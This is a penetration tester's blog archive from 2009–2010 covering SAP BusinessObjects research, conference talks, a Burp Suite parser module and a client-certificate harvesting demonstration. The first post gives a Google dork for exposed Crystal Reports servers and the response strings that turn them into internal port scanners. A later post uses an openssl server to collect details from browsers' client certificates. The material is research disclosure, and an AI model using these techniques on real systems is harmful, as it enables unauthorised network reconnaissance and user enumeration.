Internal Port Scanning via Crystal Reports

December 2, 2010

Another fun attack that willis and I found during our SAP BusinessObjects research is that we could do internal port scanning by using Crystal Reports.

The way this works is that when you browse to a Crystal Reports web application (http://hostname/CrystalReports/viewrpt.cwr) there are a few parameters which are used to communicate with the SAP services on the backend. The problem here is that these parameters are controlled by the user. Now a better way to do this is to provide a drop-down list or make all the configurations done by the server.

Now the user can modify the IP and port which the web application is trying to communicate with on the backend. By default the port is 6400. Now the ability to modify the IP and port is good. The next step is to map the responses to open and closed so that we could programmatically map out the internal network.

Here are a few nice Google Dorks:
filetype:cwr inurl:apstoken

Here is the resulting mapping :


Port Open Response:
# Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)


Port Closed Response :
# Server $HOSTNAME:80 not found or server may be down (FWM 01003)

Lastly the only thing we need to do is to modify the IP and port to whatever we are trying to scan. This is faster than using BeEF’s JavaScript internal portscanning functionality and it doesn’t require client interaction. Pwn dem v0hns!




Security-patching Common Web Development Frameworks

November 22, 2010

A few weeks ago at OWASP AppSec DC we made progress on an idea that several of us (@RafalLos, @secureideas, @securityninja, @TheCustOS) have been talking about on twitter for a while. The idea is based on trying to determine a good solution to what we see as the general brokenness of the Internet’s web applications. Not only do we see current applications as badly broken but the velocity at which developers are building new insecure web application is increasing. The panel that we hosted at OWASP AppSec DC discussed one method which we can contribute to reduce the rate at which new, insecure web applications are being developed.

Our idea is based on improving the security of existing web application development frameworks; adding security components into their core, thus making security more transparent to the developer and potentially having the effect of producing more secure web applications.

While there are certain elements of WebAppSec which will help to reduce the volume and impact of vulnerabilities such as training; training simply hasn’t proven to be a solution which scales well. The root of the problem with training is that the number of developers in the world is many orders of magnitude more than the number of WebAppSec trainers. The trainers are also limited due to several factors such as the need to understand language-specific constructs and limitations and the need to constantly keep up with changing development methodologies. This drastically impacts the pool of qualified, available trainers.

There are two factors which we need to address so that everyone is clear the types of vulnerabilities we want to cover and how we will improve existing frameworks. Trying to fix all WebAppSec vulnerabilities programmatically is an arduous and complex task. Therefore, we have decided to focus on form-based attacks (SQLi, XSS etc). Our approach will focus strictly on the types of flaws which can be readily addressed with minimal impact to the framework structure, and coding principles of the framework.

Next we have to cover which frameworks, and the versions we will try to improve. From the panel discussion, the consensus is that it is important for us not to focus on adding security to legacy versions of the frameworks since this would be a losing battle which isn’t really worth fighting since developers will over time likely be moving to newer versions of the frameworks with the applied fixes.

The core idea is to improve existing development frameworks by adding security controls into the upstream version of the framework. This means that as the framework is improved with additional features which developers will want, they will have the added benefit of getting a more secure framework “right out of the box”. We understand that developers have little incentive to produce more secure code over meeting their often aggressive release deadlines. Making the frameworks incorporate security is very important, and I think the ideal way to reduce the rate at which vulnerable web applications are being developed by making it more difficult for developers to write insecure code. This change means that from a business perspective the negative time and productivity impact to write “more secure code” is reduced… Our goal is to make the applications being developed more secure, by making security less visible and requiring less effort. We feel this will be the most effective and impactful method of raising overall web application security – by making it simple and (nearly) transparent for developers. We know developers don’t write poorly secured code on purpose, so by making security easier on them, there is a greater chance of the final product having a higher level of software security. It may not be possible to make the entire Internet secure but if we can change the velocity at which new, vulnerable web applications are being developed then we are really making huge strides toward a more secure Internet.

Perhaps the most important question is now that we have an acceptance of our idea – what do we do first? Clearly, step one is gaining community support. I’m not 100 % sure that creating a new OWASP project is the best method… The alternative to this is to use another site like Google groups and/or something similar for managing our efforts.

We welcome community input! Please feel free to leave comments. We are looking forward to see what other people in the community have say about these ideas.

Pentesting Web Services

November 21, 2010

Recently, I have been doing a few presentations with Will Vandevanter (@willis__) talking about Hacking SAP BusinessObjects. As a reference to anyone who hasn’t seen the presentation I thought it would be useful to do a few follow-up blog posts to clarify a few topics in greater detail.

The essence of the presentation was focused on pentesting SAP’s Service Oriented Architecture (SOA). There are two common ways to do SOA (SOAP and REST). The method used by SAP BusinessObjects is SOAP. For anyone that isn’t familiar with SOAP, just think of XML messages on top of HTTP. Below is a simple ruby client that makes a SOAP request to the web service. There are a few things which make this sample very useful to anyone that is performing a penetration test. The first is the request / response are stored in txt files. This is useful to logging and manual review of details. The second, is that the request is made using a local proxy on 8080/tcp (BurpSuite, WebScarab etc.).

By using a proxy the pentester can have fine grained control of the request. Even though BurpSuite doesn’t have built-in web services support, pentesters can still use the proxy to intercept requests since it’s just HTTP. The way this works is to intercept a SOAP request then utilize the intruder to fuzz any perimeters in the the web service. Pentesters also use BurpSuite (or w/e proxy) to perform replay requests and perform PRNG testing (similar to session id testing)

Sample Ruby SOAP client

Let me know what you think. What methods are you using to pentest web services? What tools do you use ? Comments welcome!

Hack the Planet!


Sans Pentest Summit 2010 – Goal Oriented Pentesting

August 4, 2010

Back in June, I was in Baltimore for the SANS Pentest Summit 2010. I really enjoyed this conference, since it provided the opportunity to chat with many people that are working on ways to improve the penetration testing process. At the conference, I presented the Goal Oriented Pentesting theory that I have been talking about for a while(first post, second post) The talk expanded upon the original theories by incorporating specific methods which provided criteria for anyone that is looking to implement Goal Oriented Pentesting in their security assessments. I also included examples from several security assessments that I have performed (external pentesting, internal pentest and web app audit) so that attendees would be able to use these goals a guide in the future.

The slides from the talk can be found here.

What else should be done to improve upon this? Let me know what you think!

OWASP AppSec 09 – Synergy! A world where the tools communicate

November 3, 2009

On November 12th, I will be giving a talk at the annual OWASP AppSec conference titled “Synergy! A world where the tools communicate”. I am really excited to give this talk since I have been working on the content for almost 2 years. If you have attended any of my talks in the past like BlackHat/DefCon, ShmooCon and/or InfoSec World you already know that I will bring tons of fresh code! I can’t wait for OWASP AppSec 09.

Brace yourself. We are gonna raise the bar on the industry.


Burpsuite::Parser 0.01

October 15, 2009

Just to get everyone excited for my talk, “Synergy! A world where the tools communicate” at OWASP NYC today, I decided to release Burpsuite::Parser 0.01 a little early.

Here is an example of using the module:

my $bpx = new Burpsuite::Parser;
my $parser = $bpx->parse_file('burpsuite.xml');
#a Burpsuite::Parser Object
my @results = $parser->get_all_issues();
#an Array of Burpsuite::Parser::Issue Objects
foreach my $h ( @results ) {
     print "Severity: " . $h->severity . "\n";
     print "Host: " . $h->host . "\n";
     print "Name: " . $h->name . "\n";
     print "Path: " . $h->path . "\n";
     print "Proof of Concept:\n " . $h->issue_detail . "\n";

Version 0.01 of the module can be found at

One good thing to note, all of the request/responses are automatically included in the XML. To reduce the size of the XML, it may be helpful to generate an XML file without them. This will make parsing faster.


Client-Side Certs – Oh my!

October 12, 2009

One of the techniques demonstrated during the BlackHat/DefCon talk I gave with RSnake was utilizing client-side certificates. Client-side certificates allow for a client to gain a certain amount of trust for the server in which they are connecting. They are used by companies that don’t want to worry about using tokens, so instead they use client-side certificates. Client-side certificates are also used by several sslvpn devices.

To demonstrate client-side certificates, I first needed to create a few certificates so the client could connect to the server.

Using openssl, I created the certificate:
openssl req \
-x509 -nodes -days 365 \
-newkey rsa:1024 -keyout mycert.pem -out mycert.pem

Next, I needed to setup the server to use the certificate. I started thinking about he easiest way to accomplish this goal. It occurred to me that instead of using Apache, I should use the built-in webserver in openssl. This made setup easier, since I replaced Apache with a single command

Here is an example:
openssl s_server -accept 443 -cert mycert.pem -www -verify 10

Finally, I setup a client and verified that the browser contained a client-side certificate for ANOTHER server. Therefore, there is no trust relationship between the public key within the client’s browser and the openssl server. The key is the browser, will ask to send the public key everytime! The only thing an attacker needs to do, is to be listening on the wire and intercept the public key.

Now you may ask, “who cares about the information in a public key?” Well, client-side certificates can contain the following information:

  • Email Address (perhaps a valid username)
  • Hostname and maybe OS of the server
  • Date the Certificate was Issued
  • Date the Certificate Expires

Sometimes, the email address being used contains the user’s name. For example, many organizations standardize on a common email schema to construct email addresses. For example, they may use some variation of the first and last name of the employee.


  • [firstname].[lastname]
  • [firstname]-[lastname]
  • [firstname]_lastname]

If this is the case, an attacker can extract this information and now the attacker knows the user’s full name. For the purposes of achieving remote access, it is only a piece of the puzzle.
The next piece of information was the date the certificate expires. Since we know of a valid email, it is possible this is also a valid username for a network based attacks. Putting both the username and dates together means that the attacker has a greater likelihood for performing a successful attack.

OWASP NYC – Raising the bar on Pentesting!

October 11, 2009

I will be giving a talk at OWASP NYC/NJ this coming Thursday(October 15, 2009). The talk is heavily focused on improving the penetration testing process. It is important for the tools that are used during a penetration assessment to communicate because it will allow for the assessment to streamline much of the tasks that have been manual in the past. The goal of this presentation is to discuss the need for communication between security tools and to demonstrate several examples in which integration can provide the ability to reduce the amount of time spent manually correlating information. This will improve the penetration testing process! If you were to perform an assessment manually (ie without any tools communicating) and compare the results to an assessment in-which all the tools were communicating, the results would clearly demonstrate that communication between tools leads to a better assessment. Therefore, all security assessments need to move in this direction.

For this presentation, I will be demonstrating several modules that I have been working on to provide communication abilities to many of the most popular security testing tools for pentesting and web application security assessments. This presentation will be filled with tons of new tools and modules that I will be releasing for the first time. Many of these tools will make pentesting easier and help to automate much of the tedious tasks of security testing.

I look forward to hanging out with people after the talk and getting their feedback on ways to improve the functionality that I have built.


CSI – Web Application Panel

September 18, 2009

I have been asked by Rafal Los (a good friend of mine) to join him on a panel at CSI in October to discuss the current state and future of Web Application Security. I’m really excited for the Panel and it will be fun to catch up with many people that didn’t make it to BlackHat and DefCon.

Here is the information on the presentation:

Title: Web Summit
Date/Time: Monday (October 26, 2009) 2:00pm — 5:30pm
Topic: Web 2.0

An informed host and select group of expert speakers tackle web issues. After brief presentations, debates and open forums, you’ll more fully understand the issues and solutions, and have the insight that will guide you to better, more confident decisions regarding those complex and challenging issues.

Morphing more business functions into Web 2.0 applications offers both irresistible business opportunities and undeniable security threats. Criminals are using the Web as an attack vector and crafting more sophisticated, exceptionally targeted attacks. Yet who needs to exploit vulnerabilities when there are plenty of malicious ways to use legitimate applications, like social networking sites and microblogs. And what about the browser? A browser is in a position to both protect the local device from Web-borne threats and thwart attacks that take place solely within the Web—but are current browsers proactively shouldering their security responsibilities? Learn how to both secure your organization’s own Web site and protect your sensitive data from attacks launched from other vulnerable Web sites. Get to know the Web-based threats of today and tomorrow, and explore what next-generation security tools could live up to the promise of revolutionizing Internet security.

I. Web application vulnerabilities and attacks
II. Browser attacks
III. Mitigating Web security threats and next-gen solutions

"Unmasking You!" at BlackHat 09 and DefCon 17

August 7, 2009

Last week, I gave a presentation with Robert “RSnake” Hansen called “Unmasking You!” at BlackHat 09 and DefCon 17.

The slides and demos can be found at:

Originally, we were only scheduled to speak at DefCon, but due to a last minute change we spoke at both venues. The backstory of how that occurred, is kind of funny so I figured I would share it with everyone who hasn’t heard it yet.

On July 26th, I decided to go out on a twilight fishing boat after a week long engagement in LA. We weren’t really having much luck catching fish, a few missed opportunities but no fish. As the sun began to set over the harbor, my expectations shifted to enjoying the evening and the week ahead in Las Vegas at BlackHat and DefCon. Around 10:30 or so, I got a call from “RSnake”, and he said “There has been a scheduling change, would you like to give the talk at BlackHat?” That was the only moment in my life, that I was happy I didn’t have a fish on my fishing line. I gladly accepted the invitation and knew that the next with 48 hours would be interesting, since I still needed to record many of my demos. Once I arrived in Vegas, I spent the majority of the time preparing all of the demos and getting things ready. The end result was around 9 recorded demos and 2 presentations.

Our presentations went really well and everyone had great comments and feedback. I had an amazing time hanging out with tons of friends who I only see once a year. I had a chance to meet Wade Alcorn (the author of BeEF). BeEF for those who have not used it, is an browser exploitation framework and it is very useful in performing penetration assessment. For the talks, I wrote all of my code and ported several of RSnake’s code to BeEF as modules, which will be included in the next release (should be out in a few weeks). All of the demos demonstrated methods that attackers can used to determine information about the victim’s machine.

I hope everyone enjoyed the talk and I look forward to seeing everyone again next year in Vegas!